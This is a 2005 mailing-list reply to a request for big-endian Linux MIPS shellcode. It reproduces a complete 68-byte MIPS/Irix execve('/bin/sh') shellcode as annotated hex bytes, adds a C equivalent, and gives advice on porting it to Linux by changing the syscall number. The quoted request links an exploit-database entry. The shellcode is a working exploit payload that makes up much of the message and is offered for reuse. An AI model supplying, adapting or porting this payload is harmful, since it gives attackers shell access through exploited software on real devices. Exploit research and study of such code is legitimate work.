Re: Linux MIPS shellcode (Big Endian)

You could base it off of this. Looks big-endian to me, based on my somewhat limited knowledge of MIPS architecture.

/* 68 byte MIPS/Irix PIC execve shellcode. -scut/teso */
"\xaf\xa0\xff\xfc" /* sw $zero, -4 ($sp) */
"\x24\x06\x73\x50" /* li $a2, 0x7350 */
"\x04\xd0\xff\xff" /* bltzal $a2, dpatch */
"\x8f\xa6\xff\xfc" /* lw $a2, -4 ($sp) */

/* a2 = (char **) envp = NULL */
"\x24\x0f\xff\xcb" /* li $t7, -53 */
"\x01\xe0\x78\x27" /* nor $t7, $t7, $zero */
"\x03\xef\xf8\x21" /* addu $ra, $ra, $t7 */

/* a0 = (char *) pathname */
"\x23\xe4\xff\xf8" /* addi $a0, $ra, -8 */

/* fix 0x42 dummy byte in pathname to shell */
"\x8f\xed\xff\xfc" /* lw $t5, -4 ($ra) */
"\x25\xad\xff\xbe" /* addiu $t5, $t5, -66 */
"\xaf\xed\xff\xfc" /* sw $t5, -4 ($ra) */

/* a1 = (char **) argv */
"\xaf\xa4\xff\xf8" /* sw $a0, -8 ($sp) */
"\x27\xa5\xff\xf8" /* addiu $a1, $sp, -8 */

"\x24\x02\x04\x23" /* li $v0, 1059 (SYS_execve) */
"\x01\x01\x01\x0c" /* syscall */
"\x2f\x62\x69\x6e" /* .ascii "/ bin" */
"\x2f\x73\x68\x42" /* .ascii "/sh", .byte 0xdummy */

If you compiled a C program like this for linux-mips:

int main()
{
	execve("/bin/sh",NULL,NULL);
}

You should be able to see what's going on.

I'd imagine that linux syscall wants you to put arguments in $a0, $a1, etc, and syscall number in $v0. This is how the MIPS calling conventions are, I think, so I would imagine linux respects them. It might be as simple as changing the syscall number.

On Dec 15, 2005, at 6:04 PM, Roman Medina-Heigl Hernandez wrote:

Hi,

Does somebody have shellcode for linux-mips (MSB)?

I found this for LSB (Little Endian) Cobalt:
http://www.milw0rm.com/id.php?id=1306

I'd like to play with Broadcom chipset and MSB (Big Endian)...

--

Saludos,
-Roman

PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB  29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]